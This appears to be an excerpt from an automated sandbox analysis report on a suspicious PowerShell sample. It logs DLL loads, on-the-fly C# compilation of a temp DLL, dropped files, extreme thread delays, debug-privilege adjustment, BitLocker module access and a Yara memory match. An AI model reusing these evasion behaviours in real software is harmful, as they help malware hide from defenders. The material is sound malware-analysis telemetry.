    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: e.pdb source: powershell.exe, 00000000.00000002.3592895893.0000014B576D2000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.cmdline"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.cmdline"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848DE7967 push ebx; retf 0_2_00007FF848DE796A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848DE7513 push ebx; iretd 0_2_00007FF848DE756A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848DEB6FB push esp; retf 0_2_00007FF848DEB6FC
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848DE00BD pushad ; iretd 0_2_00007FF848DE00C1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848EB240C push 8B485F95h; iretd 0_2_00007FF848EB2411
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.dllJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3926Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5927Jump to behavior
    Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 959Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep time: -11990383647911201s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wpRtIlQXqGKRySPIqEMuVKvjzeBejKFirvzOguBEkQthkQbvNuUXUPLxsaiulNtUPcPsptNtWAzjcVHerQhkYwdEbwjItusOeIPuObPPqmUbuwIMUWnRXLRY
    Source: ModuleAnalysisCache.0.drBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wQhtziTSlxjVxhfWZRLAOJEhlnVpjEnwMGHWuMKhGyFCfJUcaZLxWtfFdSykmVrHYqsvgBQhjWXBuTsABPmvMcibMGsRTKMHHULkVhSefvKLealYiKgGyCpF
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wqEMuVKvjzeBejKFirvzOguBEkQthkQbvNuUXUPLxsaiulNtUPcPsptNtWAzjcVHerQhkYwdEbwjItusOeIPuObPPqmUbuwIMUWnRXLRYKkrFrFEabJKgWnP
    Source: ModuleAnalysisCache.0.drBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3FFD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wZNgeWDLPLgLjOzupRtIlQXqGKRySPIqEMuVKvjzeBejKFirvzOguBEkQthkQbvNuUXUPLxsaiulNtUPcPsptNtWAzjcVHerQhkYwdEbwjItusOeIPuObPPq
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wZRLAOJEhlnVpjEnwMGHWuMKhGyFCfJUcaZLxWtfFdSykmVrHYqsvgBQhjWXBuTsABPmvMcibMGsRTKMHHULkVhSefvKLealYiKgGyCpFIxyRoUzpIDpRZXX
    Source: ModuleAnalysisCache.0.drBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000000.00000002.3466876782.0000014B3F6C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wBSubUeartsxdVflQhtziTSlxjVxhfWZRLAOJEhlnVpjEnwMGHWuMKhGyFCfJUcaZLxWtfFdSykmVrHYqsvgBQhjWXBuTsABPmvMcibMGsRTKMHHULkVhSef
    Source: powershell.exe, 00000000.00000002.3592895893.0000014B576D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6404, type: MEMORYSTR
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.cmdline"Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2CC0.tmp" "c:\Users\user\AppData\Local\Temp\xtxy3idj\CSCB2373C2DB48C49F0A0BD39442F2F8C98.TMP"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
